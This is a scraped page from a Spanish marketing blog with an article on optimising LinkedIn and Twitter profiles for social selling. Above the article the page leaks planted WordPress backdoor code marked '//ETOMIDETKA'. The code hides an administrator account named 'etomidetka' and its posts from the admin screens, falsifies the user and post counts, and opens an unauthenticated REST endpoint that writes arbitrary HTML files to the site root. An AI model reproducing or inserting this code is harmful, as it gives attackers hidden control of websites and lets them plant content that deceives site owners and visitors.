//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } Cómo optimizar tus perfiles de LinkedIn y Twitter para el social selling - Amazonas Digital
Tecnología

Cómo optimizar tus perfiles de LinkedIn y Twitter para el social selling

En el mundo del social selling, los perfiles de vendedores en redes sociales deben ser algo más que un currículum digital. Deben ayudar de manera activa a cultivar una buena reputación con tus clientes en la que te muestres como una figura de confianza que puede aportar perspectivas frescas para sus negocios o necesidades. Por esta razón, debes rehacer tus perfiles de redes sociales para cambiar tu foco de audiencia de los reclutadores a los compradores potenciales. 

Cómo optimizar tu perfil de Twitter 

Una revisión y optimización es realmente un proceso sencillo, ya que no tienes mucho espacio para trabajar en la optimización de tu perfil. Puedes seguir estos pasos: 

  • Publica una foto profesional. 
  • Escribe una declaración con tu postura profesional. 
  • Agrega un enlace de la cuenta de Twitter de tu compañía (por ejemplo: Representante de ventas @empresa). 
  • Agrega tu perfil de LinkedIn. 
  • Incluye hashtags que sigan tus clientes. 
  • Ofrece una visión resumida de tu perspectiva. 

Cómo optimizar tu perfil de LinkedIn 

Reescribir tu perfil y extracto en LinkedIn requiere un trabajo más intenso, pero es un ejercicio bastante valioso y del que puedes aprender mucho. Una buena pregunta que puedes hacerte mientras trabajas en la optimización del perfil en LinkedIn es: «¿Mi cliente objetivo se interesa por este tema?». Si la respuesta es no, probablemente debes eliminar esa frase o perspectiva y empezar algo distinto. 

Te puede interesar

Queremos llevarte del cero al Metaverso

Te dejamos 7 pasos para hacer una edición más sencilla y eficaz a tu perfil de LinkedIn: 

  1. Carga una fotografía de alta resolución: de acuerdo con LinkedIn, los perfiles con fotos tienen una tasa de respuesta en InMail del 40%. Hay algunos tips útiles para elegir una foto profesional. 
  2. Asegúrate de que el titular sea una propuesta de valor breve: no solo escribas un titular, sino considera contestar preguntas como a quiénes y cómo ayudas. 
  3. Escribe un resumen 3×3: 3 párrafos de 3 o menos frases cada uno. Vuelve a tu propuesta de valor en el primer párrafo; en el segundo, brinda un par de pruebas sobre cómo ayudas a tus clientes a obtener resultados. Incluye una llamada a la acción (CTA) en el último párrafo explicando por qué y cómo debería contactarte un cliente. 
  4. Publica unas cuantas imágenes: eso será de utilidad para tus clientes y futuros consumidores. 
  5. Escribe la sección de experiencia: pon énfasis en cómo lograste que tus clientes mejoraran sus negocios. No solo cuántas veces o por cuánto has logrado superar la cuota que comúnmente alcanzan otros representantes. 
  6. Busca recomendaciones de clientes: así aumentarás tu credibilidad. 
  7. Únete a grupos: busca aquellos en los que están tus clientes. 

 Contenido tomado de  https://blog.hubspot.es/sales/guia-social-selling

Reproducido por Contenidos Digitales Ingenieros de Marketing  

www.imkglobal.com  

www.ingenierosdemarketing.com.co  

www.JulianCastiblanco.com  

www.deceroasapo.com  

www.oceanosvioleta.com  

www.aprendizajeconresultados.com  

www.GerenciaDigital.com.co  

www.Socry.co  

QUIERES POSICIONAR TU MARCA EN INTERNET? SOLICITA INFORMACIÓN DE CONTENT ADS de IMK GLOBAL  

  • Red de portales de noticias y blogs de nicho para posicionar y aumentar la reputación de tu marca.  
  • Apalancamiento Digital consiste mencionarte desde portales de alto tráfico, posicionamiento y reputación.  
  • Por ejemplo busca: el mejor profe de marketing digital  
  • Formatos: menciones, artículos, banners, entrevistas  

https://wa.link/fwrf7b  

About the author

Ingenierosdemarketing